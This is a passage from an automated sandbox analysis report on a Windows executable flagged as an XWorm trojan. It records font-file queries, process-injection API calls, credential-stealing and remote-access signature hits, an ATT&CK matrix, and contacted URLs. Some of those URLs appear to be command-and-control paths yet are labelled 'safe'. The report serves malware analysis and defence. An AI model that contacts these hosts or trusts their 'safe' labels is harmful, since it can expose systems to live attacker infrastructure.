Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_008A7E50 GetProcessHeap,HeapAlloc,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateEventW,CreateNamedPipeW,ConnectNamedPipe,GetLastError,GetLastError,GetLastError,GetProcessHeap,HeapFree,LocalFree,

6_2_008A7E50

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_008A7A8E GetSystemTime,

6_2_008A7A8E

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_00884764 GetProcessHeap,HeapAlloc,GetUserNameExW,GetLastError,SysFreeString,GetProcessHeap,HeapFree,

6_2_00884764

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match	File source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match	File source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Shared Modules	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	2 Clipboard Data	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	613 Process Injection	4 Obfuscated Files or Information	NTDS	213 System Information Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	241 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	613 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
mQY9ka5sW6hv2Ri.exe	32%	ReversingLabs	ByteCode-MSIL.Trojan.XWorm
mQY9ka5sW6hv2Ri.exe	100%	Avira	HEUR/AGEN.1308761
mQY9ka5sW6hv2Ri.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.883106.photosReferer:	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	Avira URL Cloud	safe
http://www.manga-house.com	0%	Avira URL Cloud	safe
http://www.bdsmnutzbar.info/dy13/H	0%	Avira URL Cloud	safe
http://www.sdplat.media/dy13/?Cj9LK=8pm41D0p&0N=ZKZE34nO5+VJCQ7V97/Oxkx+yV2XZDJ4QNe5btj3ut8Iv1OZ3MT37vqx38H3jKbLJXyY	0%	Avira URL Cloud	safe
http://www.umeshraja.comReferer:	0%	Avira URL Cloud	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	Avira URL Cloud	safe
http://www.acc-pay.top	0%	Avira URL Cloud	safe
https://aka.ms/odirmr	0%	Avira URL Cloud	safe
http://www.real-estate-96841.bond/dy13/	0%	Avira URL Cloud	safe
http://www.sdplat.mediaReferer:	0%	Avira URL Cloud	safe
http://www.bdsmnutzbar.infoReferer:	0%	Avira URL Cloud	safe
http://www.cpuk-finance.comReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	0%	Avira URL Cloud	safe
